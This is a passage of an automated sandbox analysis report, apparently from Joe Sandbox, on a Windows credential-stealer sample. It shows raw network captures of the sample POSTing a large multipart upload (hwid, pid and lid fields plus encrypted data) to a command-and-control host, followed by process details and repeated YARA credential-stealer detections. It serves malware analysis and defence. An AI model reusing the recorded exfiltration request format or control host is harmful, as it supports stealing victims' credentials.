                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1081&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2186&delivery_rate=2661764&cwnd=231&unsent_bytes=0&cid=7dff8c2dfcc95386&ts=733&x=0"
2024-10-31 16:26:15 UTC | 23                | IN        | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                          Data Ascii: 11ok 173.254.250.77
2024-10-31 16:26:15 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.5 | 49710       | 188.114.97.3   | 443              | 1532 | C:\Users\user\Desktop\file.exe
Timestamp               | Bytes transferred | Direction | Data
2024-10-31 16:26:16 UTC | 285               | OUT       | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 585874
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 79 e4 ef 92 bf a4 b4 78 92 a3 a2 1c 2c 08 fc 2c e2 9a 03 04 c0 1b 21 3b b5 5a 70 3d c4 e9 c0 98 c6 ed 0a d1 75 8d fa 6d e6 d6 23 09 01 79 b1 65 2c e1 5e a8 b9 5e 80 30 49 8a 54 69 f2 2e b0 b4 6c e7 7e 79 5a b9 49 90 90 de f9 ea 71 21 0b 23 55 d8 f7 e0 13 e6 bb 42 87 3e 2e 4f 9c 56 8e ae 12 04 62 95 93 cf f3 01 75 aa 01 ab 5d 7e 6a c1 a1 d7 e0 d7 d3 d5 4a d7 ff e4 50 b0 38 67 e4 f5 83 50 57 51 d6 e2 6f 6a fb 63 f8 a3 13 0c e0 8b f2 ad b6 07 e5 6d 90 9f fb 05 ec dc 98 1d cf 74 59 ff f3 07 65 ee cc 2a bf bb 95 c0 64 37 24 8f 8c de 1b 7b c0 7e a4 ab d4 29 b0 37 ff 2d b4 1d 75 79 0c d8 25 5f fe b7 a1 b3 ae 1a e1 07 1d 60 0e 87 88 4d 6a 3e 02 38 5e 89 00 49 a6 69 83 39 1a eb 9f cc 2a a0 04 48 a2 b8 3b 28 21 fb e3 e0 ad 4d ca 85 4e 3b 88 b9 4f ae 5f 18 38 3e c8
                                                                            Data Ascii: yx,,!;Zp=um#ye,^^0ITi.l~yZIq!#UB>.OVbu]~jJP8gPWQojcmtYe*d7${~)7-uy%_`Mj>8^Ii9*H;(!MN;O_8>
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 19 49 51 22 fd 13 e5 fb 65 d3 d8 40 83 b2 d7 f4 ce b2 5f f7 df 87 fb 65 c7 c5 c6 6e 68 9d 47 3e ae 9b e7 20 c2 73 5d 16 7d 9e a3 8b 3a ba 26 cb bc b0 b3 1d fd d7 1e 42 36 6d 81 d8 f6 c1 5c ea d7 a8 12 5d ec 6d 3e 65 56 d0 57 00 9c dd a6 07 b9 77 76 cc 30 9c 36 2b 07 96 2a 77 2c d8 1f e0 b5 0f 05 8f 27 2e dc 54 bc 4c af 5b 9f 5f 1c 34 d3 5b 5c d1 a1 ff d1 02 88 9d 8b 51 47 b4 82 72 32 fd 5f 98 6c 4c 3d 75 be 3a 9c a0 b2 b7 7a a6 be db 64 4f 56 d5 36 34 fc 80 41 a4 24 a1 40 bc 99 57 5b 8d f5 20 43 9e 1b ca eb a6 0f fd ef 39 95 a7 01 7d f7 6f ed f1 d0 0b 02 11 17 40 f8 d0 cd 70 0f c0 96 7d 0a c0 49 33 d0 1f 0e fa af cf f8 20 df 16 03 0a cf 89 db fc bf 87 f3 24 1d 15 b0 79 2d 8a a0 67 41 a8 b1 a2 89 21 00 f0 18 e1 66 90 d5 50 5b dd d4 58 8e 0e 60 3e a8 19 a9
                                                                            Data Ascii: IQ"e@_enhG> s]}:&B6m\]m>eVWwv06+*w,'.TL[_4[\QGr2_lL=u:zdOV64A$@W[ C9}o@p}I3 $y-gA!fP[X`>
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 61 a9 f2 1c 15 8a e0 e1 e7 b0 93 b2 4a d7 07 ed 7a 4a 68 27 60 59 95 6b 62 fc 56 75 47 cc 0c 95 bf 2a dd cb 04 ed 65 82 c5 d2 76 4c 21 07 60 a9 93 1d 5a 03 78 94 6d d4 27 56 54 10 e4 a2 3e 88 54 8c 17 47 ef d9 cd 2e 3c ca e4 3b 7c 64 bc 82 ae 30 d3 92 25 af a4 e0 1c e6 00 ae c0 32 eb 8c fc 05 1c 62 7b 8d 41 83 cb 2d 84 df 3d fa 99 ed 64 ae 53 aa 07 4f f2 53 38 ad 2b 4c 8a 03 ff c2 ca 57 ec c6 4a fd ab 03 56 cb 2a be a9 92 b6 d4 02 1c 53 aa 9f 9f 7c f0 83 73 10 1c 09 b9 24 02 78 9b 32 48 a4 21 41 1a d8 a5 5c cc 08 14 6a b2 37 76 54 f3 cd 0a b2 94 ae e9 2e 03 84 fd db 5a 51 f3 ec 85 12 c1 d7 62 40 f4 e0 d5 11 47 65 b0 d1 c3 09 e6 48 72 57 67 7d 8a 3e b0 a6 85 38 5b e8 8a 75 55 6a 59 0e 37 f2 9b 5f cf 67 f6 64 c1 7c 6b b0 59 bd f7 1f ae c1 57 6e 7c 8f 00 4d
                                                                            Data Ascii: aJzJh'`YkbVuG*evL!`Zxm'VT>TG.<;|d0%2b{A-=dSOS8+LWJV*S|s$x2H!A\j7vT.ZQb@GeHrWg}>8[uUjY7_gd|kYWn|M
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: d3 43 3c e7 ae c9 a5 9c 54 e8 e6 cb 4b 12 5e 68 6b 8c 9a e4 f7 a3 37 e4 24 13 bf e3 d0 40 4b 42 30 36 66 0f c6 8b 75 91 81 6a 8f 09 35 35 2d 87 95 1e 8c 3a a9 20 b3 be af 7d ac 5a 9f 63 ea dd ae 8f e0 e3 0e 3a e1 3b de 7f 58 66 7b fe 13 03 2f bf fb 7a ce 44 76 ac cb 9d a2 cf a7 75 45 ee 3f d4 23 38 38 d0 7a 1a 6f 1e 22 0e ef 6f d6 08 27 1c 3c 3c f3 9b 76 d4 32 27 32 91 11 5f 60 2c 30 2e 56 63 af 9b b7 70 66 34 4b 5f c0 cb 57 43 3e 9a 7f 25 bf 43 fd f8 ee 76 38 5e 60 97 d6 e5 d3 c4 cc 08 fc f3 7b ed 5d b9 cb 9c 12 c1 13 f3 3e 97 9d a3 30 c3 d0 3d 79 8c a0 14 62 bd 21 33 98 5d ac 91 fb 42 0a 8f 39 07 f2 f6 08 46 29 53 2a 2e da f5 47 21 16 12 67 6b f5 15 bd ff ef 54 fd ff ef 02 a9 90 e5 09 98 10 1c 58 ad a3 29 fa 40 0b 0e 8d c7 f4 83 b7 ad 20 95 58 87 4b 40
                                                                            Data Ascii: C<TK^hk7$@KB06fuj55-: }Zc:;Xf{/zDvuE?#88zo"o'<<v2'2_`,0.Vcpf4K_WC>%Cv8^`{]>0=yb!3]B9F)S*.G!gkTX)@ XK@
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: d9 d5 30 85 f8 8a f5 b0 13 8e 9f bd 61 ab 4f 7b 13 42 bd c8 5f 2d 04 67 92 d8 bc fa c0 27 b7 a1 19 b5 c5 c2 f5 6f a6 07 c9 96 dc e7 9c 94 d2 fe 11 c2 9b 99 42 8d bd 52 6f 68 c9 bb 1d 75 2e df 2d 7e f7 5a 17 4d a6 eb 80 ba f0 98 d9 8b b3 d4 65 be a1 7c 54 f8 59 c2 a3 3d 1e 41 a9 48 13 85 aa 6b 3e ec e4 c1 b0 b1 d8 36 fb 21 03 1e 94 db 72 64 3d e5 b9 93 87 cf 46 72 0d f1 0c f5 f9 bb b8 93 af 47 05 70 c8 06 53 86 dc 58 55 02 26 2a 00 07 dc 9a cc 65 28 da 99 b0 87 26 be d0 44 5b 02 7d 7c 86 1a 04 41 dc ab c2 2b 87 a7 c6 02 49 fd aa 73 83 a1 46 4a 3f 9b 36 4c 41 a3 85 6a 62 48 3c 12 5b b2 22 a0 af 87 5c db bc e0 9b 3c 34 9b 14 b3 d3 b7 a8 ba f2 d3 3f 28 b5 97 ea 77 8d e4 94 56 f9 a0 b9 08 b2 7e 95 52 ba 5d 70 62 1f 0a 98 59 fd fd 8e 9e 6b 06 1a 03 4a 01 9c bb
                                                                            Data Ascii: 0aO{B_-g'oBRohu.-~ZMe|TY=AHk>6!rd=FrGpSXU&*e(&D[}|A+IsFJ?6LAjbH<["\<4?(wV~R]pbYkJ
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 5d 89 9a cc 13 88 e8 93 68 2a 08 eb 71 a1 56 33 2b 98 71 4b c7 ee 89 ea c6 dd db ff b9 e0 91 38 8d 7f 89 5f 35 56 89 c6 b3 2c bc d6 7b 05 af b9 e3 c5 d7 2a 30 3c 62 19 e1 11 bd 2a b4 e4 20 c0 d0 36 c8 eb 3e 02 de 1f 55 15 58 58 9e 5c ce aa d1 8d c1 cc 5a 0e 9b 48 23 49 ff 52 52 d6 90 d7 99 2a 11 a2 74 cb e5 64 8a 11 c0 37 13 a9 15 b6 65 3e 67 63 89 55 87 b7 7b be 53 64 77 d2 5b 86 3b df 27 6a f9 96 7a 72 e6 dd 39 3e f4 a5 c5 cf 94 75 f7 77 3f d4 17 7f 02 52 86 0f 23 49 ff 05 82 b6 3f a0 f4 4a cf 8e 18 92 66 7e d7 cb e5 16 f0 30 d2 02 4b cd 9b f6 7e 13 df 39 42 c5 e4 4c 4c 88 29 0e b0 8b 6f 65 bc e8 cc d9 4c fe 6e ab 04 65 d9 64 78 7f f7 4d 47 81 3f 65 48 4e fe 9b ab 20 a3 cd 12 07 3e 8d 70 51 0b 4f 97 25 7e f6 bd 0d 97 a8 34 ff 00 a1 12 e6 9a 7f 30 ef a6
                                                                            Data Ascii: ]h*qV3+qK8_5V,{*0<b* 6>UXX\ZH#IRR*td7e>gcU{Sdw[;'jzr9>uw?R#I?Jf~0K~9BLL)oeLnedxMG?eHN >pQO%~40
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: df fd 6e e1 4e 42 cb ba 8f 27 bb 6a ae 1f 07 df 32 f4 17 08 84 c0 ca f6 6a 15 e6 57 d9 2d bc df b1 ca f2 c1 ec e2 45 ca e2 b2 7a 20 f3 66 05 42 c8 8b c8 17 25 14 9c ea f4 2d 13 fc 08 d8 c9 d7 a7 f5 e4 97 9e 5a 50 8d 20 d2 b9 56 3b 24 3e 3d 64 41 bd 0d 07 bd 04 0c 0c 66 d6 3b 9a 59 8e 07 79 bb a4 c0 5e e6 d1 86 7a 77 40 d9 87 cf 88 8d 1e 10 01 85 d9 ab fe ad 47 cc 18 af 04 c0 9e 16 58 1d 9f 79 0c 38 89 63 03 9f 8a 75 cd f0 80 03 3c ae 58 e0 72 18 b6 07 76 a3 23 70 29 e6 a5 18 fe cc 3b da b7 51 1f b7 e8 57 5d 04 70 89 9d ae cc 7e 78 6d b0 c9 8c 80 b2 ff 4c e1 83 c6 8f 91 d1 1c ff fd 78 15 86 4a ab 89 5c fb 4f cc 0e c6 ad 0b 4a 58 80 49 93 6d 34 22 1b ac 3a 61 4e 01 b2 39 39 21 c9 53 82 72 12 a0 88 19 f2 d5 07 cc c9 97 c8 4c 65 28 c7 e0 f7 fd 81 b3 a6 a8 3a
                                                                            Data Ascii: nNB'j2jW-Ez fB%-ZP V;$>=dAf;Yy^zw@GXy8cu<Xrv#p);QW]p~xmLxJ\OJXIm4":aN99!SrLe(:
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: ea 99 a3 3f ea 1c 96 92 f2 de 89 c2 bb 7b 13 0e 6b b8 fd 1d 57 73 36 8f 5a 8c c1 68 46 6b 37 32 a6 f0 0e 20 ec 0f a4 58 fb 01 7a 30 ee 7f 95 76 92 d4 89 22 cf 20 65 15 46 e7 1b e9 2b 01 ad 90 ac 9b 84 1e 5b 67 79 4b 1c 69 88 a6 67 db b4 8d 02 68 8c 18 dd 3a a7 35 3c 5a ef dc c4 48 a7 a4 62 87 6c 74 f2 16 92 c6 c5 6f f1 49 22 76 21 a5 ec 9c 06 a9 1d 42 f3 e2 02 be 16 57 43 af c4 50 2d aa f4 36 d4 93 46 39 f2 fd 2d 1f f1 41 98 67 be 4f 9f 26 81 ba f7 80 56 fb 46 e5 cc 0f 92 dd 11 d3 a9 cd af c1 43 15 3f 48 3a 22 ae 57 20 85 3b 16 75 a3 79 f3 7c d6 b1 26 33 a0 6b e6 cb 20 03 05 ae b4 28 0e d0 5e f3 bc 4f 9f a3 b9 80 18 7f 5e ef 5f e9 c0 6e 92 fd 53 8d 5c 8d f0 be 6b 06 63 75 9d 84 42 5b 72 1b 17 2d c7 bf b2 49 60 3d 92 b8 de 7b c3 c3 05 f3 d7 15 ee e7 3d 52
                                                                            Data Ascii: ?{kWs6ZhFk72 Xz0v" eF+[gyKigh:5<ZHbltoI"v!BWCP-6F9-AgO&VFC?H:"W ;uy|&3k (^O^_nS\kcuB[r-I`={=R
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: b0 43 d2 3f de d5 7f d7 43 57 f4 bf f0 13 db f3 f6 15 a2 7e 93 e2 4e 1f 73 90 75 5e 68 0b fb 45 54 85 db 8b 50 9e 24 6f 33 70 82 ac 00 19 b6 6e b4 16 e5 ef dd 0b 5b 54 ad f5 ac cb 5b 3f 98 79 1b c6 7b c6 58 49 ec 59 4f d1 c8 a1 99 2e 29 5f 40 39 9b 07 ca 20 7e 9e 92 1d a2 09 03 f7 9d f9 44 14 5c 51 8c e9 7b 60 97 28 de ff ef 2b d4 55 a9 9e 5a da 87 40 e1 b9 e3 36 74 5a 07 49 05 05 b2 54 2f 50 61 38 1c b5 03 2c a0 d6 76 b1 72 69 54 14 8c 8a 47 d1 f0 30 61 10 ae c0 d8 9b 09 62 df 51 01 b1 c5 1d 00 d8 73 39 88 7f 1b 26 18 43 ea 5b 6d df 47 4e 3a e0 de 5e ab d2 df 1d af 9e 23 dc 72 00 8f 3d 47 71 80 28 5e 3f eb b3 ff 16 7c 20 3c 34 b0 83 05 8c 72 c7 b8 e3 84 cf 61 8b 8a 3a 7e ce d7 d5 82 62 d2 ee 68 68 4d 61 f5 ad 11 c2 03 81 60 63 20 54 97 78 6a 58 63 d5 9a
                                                                            Data Ascii: C?CW~Nsu^hETP$o3pn[T[?y{XIYO.)_@9 ~D\Q{`(+UZ@6tZIT/Pa8,vriTG0abQs9&C[mGN:^#r=Gq(^?| <4ra:~bhhMa`c TxjXc
                                                                            2024-10-31 16:26:18 UTC1027INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:18 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=ufo4d3l2481k3t77a3mfg4em00; expires=Mon, 24-Feb-2025 10:12:57 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L7sYWITu%2FmleklFz%2BOndeGJ2A0OAX54zkrT869wOmPYo81vNtu%2BVC%2BR0DQ9Rv5E0dCkZOaqkZj7MJyQh%2F94YT0QfKfimk6IUKW3hA%2BfIDkcVWjLpU4IHfU9eFKACoRjSbtrO8pA%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db5017e2d6de7d3-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1339&sent=232&recv=640&lost=0&retrans=0&sent_bytes=2844&recv_bytes=588467&delivery_rate=2149962&cwnd=231&unsent_bytes=0&cid=b66e236f5650fcf0&ts=1897&x=0"



                                                                            Target ID:0
                                                                            Start time:12:26:00
                                                                            Start date:31/10/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0x9c0000
                                                                            File size:3'022'848 bytes
                                                                            MD5 hash:55BFAA52FB91CCAA609FDA3E4BA384F1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157368828.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156627586.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155159507.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157461915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156461163.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153485433.000000000143F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2126656306.000000000143F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157189871.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156552195.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156115915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154213981.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154539398.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153850742.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157640041.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157558824.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157692564.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2126105987.0000000001431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156174138.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154355396.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154850017.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156037411.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154796125.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156976484.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106766668.000000000143F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154725777.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154129411.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154641557.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157138050.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153793686.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2158045803.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155243058.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155948563.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155317529.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2081770128.000000000143A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154029832.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155652947.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156895572.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155068276.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156371674.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156729304.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157064648.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155858032.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154297810.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2081624288.0000000001437000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Offset: 013CE000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_13ce000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 608ed672abf0a2ae6958bb8d4047ebe09c2ed9d94db7d8ce044a8c955983d548
                                                                              • Instruction ID: 1fb9a101bf08a0d838ba179d51d9a8fa2d254b5bc81b493c959a8c7661831a32
                                                                              • Opcode Fuzzy Hash: 608ed672abf0a2ae6958bb8d4047ebe09c2ed9d94db7d8ce044a8c955983d548
                                                                              • Instruction Fuzzy Hash: 9851255684E3C01FD3238B789C64A9ABFB69E53544B0E82CBD0D1CF8A3D1595D19C323